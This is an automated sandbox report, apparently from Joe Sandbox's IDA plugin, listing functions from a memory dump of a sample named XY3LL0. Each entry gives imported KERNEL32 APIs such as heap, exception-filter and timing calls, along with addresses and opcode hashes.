GetVersionExA.KERNEL32 ref: 0000000140005AE6
GetProcessHeap.KERNEL32 ref: 0000000140005AF0
HeapFree.KERNEL32 ref: 0000000140005AFE
GetProcessHeap.KERNEL32 ref: 0000000140005B22
HeapFree.KERNEL32 ref: 0000000140005B30

Memory Dump Source

Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd

Similarity

API ID: Heap$Process$Free$AllocInfoStartupVersion
String ID:
API String ID: 3103264659-0
Opcode ID: b926c3abaa2c479ec326760b90e5a1fd11221ebaffc6337adf83b77cd4a46ae1
Instruction ID: 8fdcf1cc106887877eb8bf0912cd84dfc65bead55acac366e092854278e1a3ce
Opcode Fuzzy Hash: b926c3abaa2c479ec326760b90e5a1fd11221ebaffc6337adf83b77cd4a46ae1
Instruction Fuzzy Hash: 0F7167B1604A418AF767EBA3B8557EA2291BB8D7C5F084039FB45472F2EF39C440C741

Function 00007FF8FDF92630 Relevance: 10.6, APIs: 7, Instructions: 71COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00007FF8FDF9264C
RtlCaptureContext.KERNEL32 ref: 00007FF8FDF92679
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF8FDF92693
RtlVirtualUnwind.KERNEL32 ref: 00007FF8FDF926D4
IsDebuggerPresent.KERNEL32 ref: 00007FF8FDF92728
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF8FDF92745
UnhandledExceptionFilter.KERNEL32 ref: 00007FF8FDF92750

Memory Dump Source

Source File: 00000007.00000002.2002780109.00007FF8FDF91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8FDF90000, based on PE: true

Associated: 00000007.00000002.2002757870.00007FF8FDF90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2002809208.00007FF8FDFA2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2002832834.00007FF8FDFAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2002854171.00007FF8FDFAF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8fdf90000_XY3LL0.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 710f6283529bc39a5878960356047a6e461f095b9b13c17159f2665477d47395
Instruction ID: a7a383041ce5d6d9453c6b73a55f10248bd6e75208f40a919480d779e3608ac3
Opcode Fuzzy Hash: 710f6283529bc39a5878960356047a6e461f095b9b13c17159f2665477d47395
Instruction Fuzzy Hash: FA311D73B09B818AEB608F60E840BE97365FB54794F44503ADB5E87B94EF38D548C750

Function 0000000140007C91 Relevance: 9.1, APIs: 6, Instructions: 137COMMON

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 0000000140007D66
IsDebuggerPresent.KERNEL32 ref: 0000000140007DAA
SetUnhandledExceptionFilter.KERNEL32 ref: 0000000140007DB4
UnhandledExceptionFilter.KERNEL32 ref: 0000000140007DBF
GetCurrentProcess.KERNEL32 ref: 0000000140007DD5
TerminateProcess.KERNEL32 ref: 0000000140007DE3

Memory Dump Source

Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerPresentTerminate
String ID:
API String ID: 1269745586-0
Opcode ID: 971e421c69f8e6a9c7be80a9fd1684b11f1d9217f6c56614116cebe2abaa4248
Instruction ID: e2ab3ef72b7f240c54b21dbf897bf6525f512fe4427dd1c0d247b710ac710d4c
Opcode Fuzzy Hash: 971e421c69f8e6a9c7be80a9fd1684b11f1d9217f6c56614116cebe2abaa4248
Instruction Fuzzy Hash: 53115972608B8186D7129F62F8407CE77B0FB89B91F854122EB8A43765EF3DC845CB00

Function 00007FF8FDF976E0 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 00007FF8FDF97759
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF8FDF97771
RtlVirtualUnwind.KERNEL32 ref: 00007FF8FDF977AC
IsDebuggerPresent.KERNEL32 ref: 00007FF8FDF977E5
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF8FDF977EF
UnhandledExceptionFilter.KERNEL32 ref: 00007FF8FDF977FA

Memory Dump Source

Source File: 00000007.00000002.2002780109.00007FF8FDF91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8FDF90000, based on PE: true

Associated: 00000007.00000002.2002757870.00007FF8FDF90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2002809208.00007FF8FDFA2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2002832834.00007FF8FDFAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2002854171.00007FF8FDFAF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8fdf90000_XY3LL0.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: 5eef0cc7783b0be87f0727cc0123e63361c6ac4350bb89c20972030a757485fe
Instruction ID: 902b24464620716174ac855a7d2f3b3ce560c1833a18ca9a9564acf6e4568a07
Opcode Fuzzy Hash: 5eef0cc7783b0be87f0727cc0123e63361c6ac4350bb89c20972030a757485fe
Instruction Fuzzy Hash: AF317F33A18B8189DB60CF24E8407AE33A4FB957A4F544135EBAE43B99EF38D145CB40

Function 000000014000A370 Relevance: 7.5, APIs: 5, Instructions: 41timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 000000014000A3AF
GetCurrentProcessId.KERNEL32 ref: 000000014000A3BA
GetCurrentThreadId.KERNEL32 ref: 000000014000A3C6
GetTickCount.KERNEL32 ref: 000000014000A3D2
QueryPerformanceCounter.KERNEL32 ref: 000000014000A3E3

Memory Dump Source

Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd

Similarity

API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
String ID:
API String ID: 1445889803-0
Opcode ID: 348833bf0fd47251ec8459b694c57c39dac6eb63685dc4ebaa15df7501b8973f
Instruction ID: 72e860a1e5610cf2f60718b33953b9e9cfa3de8eae9ff42976e828aecb981d5d
Opcode Fuzzy Hash: 348833bf0fd47251ec8459b694c57c39dac6eb63685dc4ebaa15df7501b8973f
Instruction Fuzzy Hash: 4101F775255B4082EB928F26F9403957360F74EBA0F456220FFAE4B7B4DA3DCA958700

Function 0000000140004630 Relevance: 5.1, APIs: 4, Instructions: 80memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,?,?,00000001400047BB,?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 00000001400046B0
HeapReAlloc.KERNEL32(?,?,?,00000001400047BB,?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 00000001400046C1

Memory Dump Source

Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: e1b55434e6231e5ce6780f684ad3576ffb26ff33b9fae7a8d56a49fd816118fb
Instruction ID: 02c5a1d02253778f48d8bcd65850d79aa5baad65f26a42f950a3123f4edab52d
Opcode Fuzzy Hash: e1b55434e6231e5ce6780f684ad3576ffb26ff33b9fae7a8d56a49fd816118fb
Instruction Fuzzy Hash: CB31D1B2715A8082EB06CF57F44039863A0F74DBC4F584025EF5D57B69EB39C8A28704

Function 00000001400106B0 Relevance: 4.5, APIs: 3, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 00000001400106EF
SetUnhandledExceptionFilter.KERNEL32 ref: 0000000140010735
UnhandledExceptionFilter.KERNEL32 ref: 0000000140010740

Memory Dump Source

Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContext
String ID:
API String ID: 2202868296-0
Opcode ID: 905f91afdcc57dbacad6504ae7f65679640b92e152865c9b61e81d303733290d
Instruction ID: a6869a7b9d4117274e99734abe304e52ce4a6a571683f9898e15e7d65764808a
Opcode Fuzzy Hash: 905f91afdcc57dbacad6504ae7f65679640b92e152865c9b61e81d303733290d
Instruction Fuzzy Hash: 44014C31218A8482E7269B62F4543DA62A0FBCD385F440129B78E0B6F6DF3DC544CB01

Function 00007FF8FDFA0248 Relevance: 3.2, APIs: 2, Instructions: 227COMMONLIBRARYCODE

Download Yara Rule

APIs

_clrfp.LIBCMT ref: 00007FF8FDFA0497
RaiseException.KERNEL32 ref: 00007FF8FDFA04A8

Memory Dump Source

Source File: 00000007.00000002.2002780109.00007FF8FDF91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8FDF90000, based on PE: true

Associated: 00000007.00000002.2002757870.00007FF8FDF90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2002809208.00007FF8FDFA2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2002832834.00007FF8FDFAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2002854171.00007FF8FDFAF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8fdf90000_XY3LL0.jbxd

Similarity

API ID: ExceptionRaise_clrfp
String ID:
API String ID: 15204871-0
Opcode ID: 242015c6cea6594ab8d644b6eea7da2ef8062d64434110bbd4fb3fd5cf8f1a15
Instruction ID: 95f8310ae18c6caccb4f20e721af6a604ca8ec1263f71465f5c3f48c82d628cc
Opcode Fuzzy Hash: 242015c6cea6594ab8d644b6eea7da2ef8062d64434110bbd4fb3fd5cf8f1a15
Instruction Fuzzy Hash: 92B16A73604B8A8FEB15CF29D88676C3BA0F744B98F148921DB6E837A8DB39D451D740

Function 00000001400103D0 Relevance: 3.2, APIs: 2, Instructions: 183COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32 ref: 00000001400105C2
GetLastError.KERNEL32 ref: 00000001400105ED

Memory Dump Source

Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd

Similarity

API ID: ByteCharErrorLastMultiWide
String ID:
API String ID: 203985260-0
Opcode ID: 52eb8cb33472843dab3d23723d723ebc9e780f32240a0bf22a1f45fa5c529dea
Instruction ID: 2a1840496c7657cf23b6901bcaaf21815035fe120b0a860a82176d8039cbaff9
Opcode Fuzzy Hash: 52eb8cb33472843dab3d23723d723ebc9e780f32240a0bf22a1f45fa5c529dea
Instruction Fuzzy Hash: C871DF72A04AA086F7A3DF12E441BDA72A1F78CBD4F148121FF880B7A5DB798851CB10

Function 0000000140010CF0 Relevance: 3.1, APIs: 2, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a23616b521790ba98c8a4ca650accd459689c226ef9c151115ac5421c5afe981
Instruction ID: 31705e6bd3fe747407dbe92e60a9b5f63bdbefd7c066999fadf2412e4a74ef82
Opcode Fuzzy Hash: a23616b521790ba98c8a4ca650accd459689c226ef9c151115ac5421c5afe981
Instruction Fuzzy Hash: BD312B3260066442F723AF77F845BDE7651AB987E0F254224BB690B7F2CFB9C4418300

Function 00007FF8FDF9A1B8 Relevance: 1.6, APIs: 1, Instructions: 149COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2002780109.00007FF8FDF91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8FDF90000, based on PE: true

Associated: 00000007.00000002.2002757870.00007FF8FDF90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2002809208.00007FF8FDFA2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2002832834.00007FF8FDFAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2002854171.00007FF8FDFAF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8fdf90000_XY3LL0.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a2880f174246bb62df44fff46a4d3d73a1dc8eca39573d4fb70521656c567db
Instruction ID: c00914cdefede2bf6d7f4af893e38384b7383a95087b7509f83b17a476d6e7e0
Opcode Fuzzy Hash: 4a2880f174246bb62df44fff46a4d3d73a1dc8eca39573d4fb70521656c567db
Instruction Fuzzy Hash: 0E51F723F0868189FB209B76AC449AA7BA0FB507E4F144135EF6E27AD9EE3CD441C741

Function 0000000140011270 Relevance: 1.6, APIs: 1, Instructions: 84COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlLookupFunctionEntry.KERNEL32 ref: 00000001400112F1

Memory Dump Source

Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd

Similarity

API ID: EntryFunctionLookup
String ID:
API String ID: 3852435196-0
Opcode ID: 41b57387ab27fe441920d3618a9a3fade831f152bc6ed6de484845005a0f7214
Instruction ID: 0a16dca171e58903ec1b218c91cdb1b04bf095347935d32e98aab42d926b4c07
Opcode Fuzzy Hash: 41b57387ab27fe441920d3618a9a3fade831f152bc6ed6de484845005a0f7214
Instruction Fuzzy Hash: 7A316D33700A5482DB15CF16F484BA9B724F788BE8F868102EF2D47B99EB35D592C704

Function 000000014000DDD9 Relevance: 1.6, Strings: 1, Instructions: 301COMMON

Download Yara Rule

Strings

, xrefs: 000000014000E388

Memory Dump Source

Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 4dbe44af600c182fb51974a0b490eba2bf44001a013ded284afa934d15dcb5c0
Instruction ID: 9b910ad21b0c4e6c2a4c619a0863cbecb71c4e07d0bd79d978466706db7fd7a1
Opcode Fuzzy Hash: 4dbe44af600c182fb51974a0b490eba2bf44001a013ded284afa934d15dcb5c0
Instruction Fuzzy Hash: 2FD1DEF25087C486F7A2DE16B5083AABAA0F7593E4F240115FF9527AF5E779C884CB40

Function 000000014000F370 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32 ref: 000000014000F398

Memory Dump Source

Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: e82685a3153856f58f3176b49433fa40cc0a6602fc72f3bc0670cd1eec4d2bc4
Instruction ID: a72933d7652eee1ce42449f64e4370b365fbcbea739f10b8ca5cd41f8ceea018
Opcode Fuzzy Hash: e82685a3153856f58f3176b49433fa40cc0a6602fc72f3bc0670cd1eec4d2bc4
Instruction Fuzzy Hash: EDF0FEF261468085EA62EB22B4123DA6750A79D7A8F800216FB9D476BADE3DC2558A00

Function 000000014000E178 Relevance: 1.5, Strings: 1, Instructions: 260COMMON

Download Yara Rule

Strings

-, xrefs: 000000014000E358

Memory Dump Source

Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd

Similarity

API ID:
String ID: -
API String ID: 0-2547889144
Opcode ID: 2c0fe4c55243f33cdb34ec3615e3d347b9ce4ba35bb8967fdbcfce9d52a551a3
Instruction ID: 5aef184856849f1d0e814b0a8e39d0e8e949ccad25035a2bf8530ae42cfb47ec
Opcode Fuzzy Hash: 2c0fe4c55243f33cdb34ec3615e3d347b9ce4ba35bb8967fdbcfce9d52a551a3
Instruction Fuzzy Hash: 5CB1CFF36086C482F7A6CE16B6083AABAA5F7597D4F240115FF4973AF4D779C8808B00

Function 000000014000DFFE Relevance: 1.5, Strings: 1, Instructions: 256COMMON

Download Yara Rule

Strings

-, xrefs: 000000014000E358

Memory Dump Source

Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd

Similarity

API ID:
String ID: -
API String ID: 0-2547889144
Opcode ID: d0b365294d50e82b05b46562bde9ad75935525663af60c2549490a2d68dcad7f
Instruction ID: 5cc8c865c9461daf8b0756d8ed2731e20d175c685145385c3f78aef56f479fea
Opcode Fuzzy Hash: d0b365294d50e82b05b46562bde9ad75935525663af60c2549490a2d68dcad7f
Instruction Fuzzy Hash: 5FB1A0F26087C486F772CF16B5043AABAA1F7997D4F240115FF5923AE4DBB9C9848B40

Function 00000001400092E0 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 00000001400092EB

Memory Dump Source

Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 836f1dd34661b3a221f56dc19e791b08cc78d614d7e29c7f03eced68424ee8fe
Instruction ID: 6026514bbd401dabfdc0327cb8eb2cc9cc42ab70edfd582905dc0376ef34508b
Opcode Fuzzy Hash: 836f1dd34661b3a221f56dc19e791b08cc78d614d7e29c7f03eced68424ee8fe
Instruction Fuzzy Hash: 37B09260A61400D1D605AF22AC8538022A0775C340FC00410E20986130DA3C819A8700

Function 000000014000DEFB Relevance: 1.5, Strings: 1, Instructions: 216COMMON

Download Yara Rule

Strings

-, xrefs: 000000014000E358

Memory Dump Source

Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd

Similarity

API ID:
String ID: -
API String ID: 0-2547889144
Opcode ID: ac637b882370d0844742d876f6d50665fbc38b4c3acf89c25781960c99b4f2e0
Instruction ID: f0a9775499ae8e11c0cd3741dc570bab2f5201344a81d2c1a5008a9dc88a1dca
Opcode Fuzzy Hash: ac637b882370d0844742d876f6d50665fbc38b4c3acf89c25781960c99b4f2e0
Instruction Fuzzy Hash: 7E91D4F2A047C485FBB2CE16B6083AA7AE0B7597E4F141516FF49236F4DB79C9448B40

Function 000000014000DDFF Relevance: 1.4, Strings: 1, Instructions: 192COMMON

Download Yara Rule

Strings

-, xrefs: 000000014000E358

Memory Dump Source

Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd

Similarity

API ID:
String ID: -
API String ID: 0-2547889144
Opcode ID: ab76a755316d4a48554b78acaf832b3985bbd0abb48915d025235a6fa293112f
Instruction ID: 8f8310eeb878d4aa74977829efb49c2c7de80d27e4d4fb150cd5d5e4432a17d7
Opcode Fuzzy Hash: ab76a755316d4a48554b78acaf832b3985bbd0abb48915d025235a6fa293112f
Instruction Fuzzy Hash: 51818FB26087C485F7B2CE16B5083AA7AA0F7997D8F141116FF45636F4DB79C984CB40

Function 000000014000DE96 Relevance: 1.4, Strings: 1, Instructions: 191COMMON

Download Yara Rule

Strings

-, xrefs: 000000014000E358

Memory Dump Source

Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd

Similarity

API ID:
String ID: -
API String ID: 0-2547889144
Opcode ID: c4b1ae68995c86a4b6842fa045a9432b0b2524c7844d6ccb0434c0756f7f8cc7
Instruction ID: f8efd74c2ac63e8556513dce229926bc74ff59f5ae5890729ffd39c1599aad0a
Opcode Fuzzy Hash: c4b1ae68995c86a4b6842fa045a9432b0b2524c7844d6ccb0434c0756f7f8cc7
Instruction Fuzzy Hash: BE81B0F2608BC486F7A2CE16B5083AA7AA1F7587E4F140515FF59236F4DB79C984CB40

Function 000000014000CC00 Relevance: .1, Instructions: 89COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 382482a43049451918361ff49eb8a1074a352d433c0d3f6017d26c5ae398af27
Instruction ID: 63b5043dbdffafa71f1ddaca105bc0afa02b2cba45448f866c4c658d1faf9303
Opcode Fuzzy Hash: 382482a43049451918361ff49eb8a1074a352d433c0d3f6017d26c5ae398af27
Instruction Fuzzy Hash: B031B0B262129045F317AF37F941FAE7652AB897E0F514626FF29477E2CA3C88028704

Function 000000014000C2A0 Relevance: .1, Instructions: 89COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

